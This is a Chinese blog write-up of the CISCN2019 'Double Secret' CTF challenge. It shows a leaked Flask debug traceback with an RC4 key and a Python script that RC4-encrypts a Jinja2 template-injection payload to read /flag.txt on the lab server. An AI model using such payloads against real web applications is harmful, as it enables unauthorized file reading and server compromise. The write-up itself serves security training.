[CISCN2019 华东南赛区]Double Secret flask的debug

最新推荐文章于 2023-02-07 16:02:44 发布
最新推荐文章于 2023-02-07 16:02:44 发布
阅读量1.2k 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124073705
版权

打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来)

进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件)

robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助

secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试试 

不知道一个什么加密算法 ,还是回到python中flask框架开启了debug模块

Flask开启debug模式等于给黑客留了后门 - 知乎 

随便输入什么让他报错

File "/app/app.py", line 35, in secret
    if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)
 
    a=render_template_string(safe(deS))
 
    if 'ciscn' in a.lower():
        return 'flag detected!'
Open an interactive python shell in this frame    return a

 找到关于secret相关的源码报错地方,可以看到他这里用的是RC4加密

加密算法--RC4 - 百度文库

密匙就是HereIsTreasure,然后将我们上传的secret进行解密,接下来是典型的模板注入最熟悉的render渲染,如果选完后的文字全部小写化后有ciscn,会返回flag查到,于是我们上网找一个RC4的加密脚本

import base64
from urllib.parse import quote
def rc4_main(key = "HereIsTreasure", message = "ciscn"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))  # 我这里没管秘钥小于256的情况,小于256不断重复填充即可
    # print("原来的 s 盒:%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒:%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    # print("res用于加密字符串,加密后是:%res" %res)
    cipher = "".join(res)
    print("加密后的字符串是:%s" %quote(cipher))
    #print("加密后的输出(经过编码):")
    #print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")

将加密后的字符串传入secret参数即可

 

 

-栀蓝-
关注
Flask 学习-9. 开启调试模式(debug模式)的2种方法
qq_27371025的博客
08-28 4170
flask 使用app.run() 启动项目的时候,默认debug模式是关闭的,需自己开启debug模式。 本篇教2种方法开启 flask 项目debug模式。
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
[CISCN2019 华东赛区]Double Secret
qq_40327508的博客
11-28 388
页面比较简陋 扫目录扫出一个secret目录 在url加上secret参数,发现被加密 随意输入一些 他报错了~。我们发现了关键处的代码 这里的加密算法使用的是RC4,密钥泄漏了。将所发送内容解密之后会被渲染,因此考虑到可能存在模版注入。 在网上找了一个RC4加密脚本,再次基础上输入密钥并尝试文件读取。 import base64 from urllib.parse import quote def rc4_main(key = "init_key", message = "init_message"):
BUUCTF:[CISCN2019 华东赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 942
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
详解Python的Flask框架中生成SECRET_KEY密钥的方法
09-21
### 详解Python的Flask框架中生成SECRET_KEY密钥的方法 #### 引言 在进行Web应用开发时,安全性始终是不可忽视的关键因素之一。Flask作为一款轻量级但功能强大的Python Web框架,提供了丰富的工具和库来帮助开发者...
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3264
ssti的payload还是不太会写… Flask debug 模式生成pin码 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
flask中的debug的用法
热门推荐
pick_ears的博客
10-23 1万+
flask中打开debug的方式 flask中打开debug的方式如下: 接下来将介绍三种,首先从基本结构开始: 详情看周围文字 打开debug的第一种方式: 直接在app.run()中,令debug=True 运行结果如下: 打开debug的第二种方式: 使用app.debug=true+运行结果如下: 打开debug的第三种方式: 使用字典的方式2种 1、字典的第一种方式 app.config.update(DEBUG=True) app.run() 2、使用字典的第二种方式(注意True的T要
[CISCN 2019华东]Double Secret
ph0ebus的博客
02-07 1055
从一道赛题学习关于flask的模板注入和了解RC4加密
[CISCN2019 华东赛区]Double Secret flask模板 rc4加密
qq_62046696的博客
10-30 431
因为这是python中的flask模板界面,所以我们自然而然地可以想到用ssti模板注入。这里应该是进行了rc4的加密,解密密钥是HereIsTreasure。打开界面,这种要么让我们访问Secret页面,要么传参Secret。这里记得大小写的Secret都要尝试,然后让我们传参一个secret。以前碰到过这样进行输入源码,打算用脚本爆破,试一个比较大的值。需要一个rc4加密脚本,从网上搜一个。
【BUUCTF】[CISCN2019 华东赛区]Double Secret
aoao331198的博客
04-22 1882
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
[CISCN2019 华东赛区]Double Secret——还要加密?
Mrs_H的博客
11-17 325
[CISCN2019 华东赛区]Double Secret 一.前言 这波属于是忙里偷闲了,面对着几篇大作业却没有任何思绪的我,默默打开了BUU的靶场,开始了我的“偷闲”之旅(doge。可能是最近临近期末的缘故,各个老师的作业数量都开始发力了。上个学期还都是1000字,1500字,最多也就3000字,这学期倒好上来直接8000大作业,直接给我干蒙了。算了,废话不多说了直接看题吧。 二.正文 首先,老样子先截一个“案发现场”的图 经典的没有前端界面,他让我们来找secret,所以我们去访问一下secret
BUUCTF:[CISCN2019 华东赛区]Double Secret
末初的CSDN博客
04-21 1471
BUUCTF:[CISCN2019 华东赛区]Double Secret 查看robots.txt 无可用信息 线索在目录:http://274c1aad-138b-4fe6-9815-8feeaf028127.node3.buuoj.cn/secret 尝试传参?secret= 发现当字符串长度超过4位的时候,出现报错 寻找关键代码 这里调用了rc4再通过render_templat...
flask debug
最新发布
08-25
Flaskdebug模式用于在开发过程中进行调试。在Flask中,你可以通过两种方式来开启debug模式。一种是在代码中使用if __name__ == '__main__': app.run(debug=True)来开启;另一种是通过设置app.debug = True来开启,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值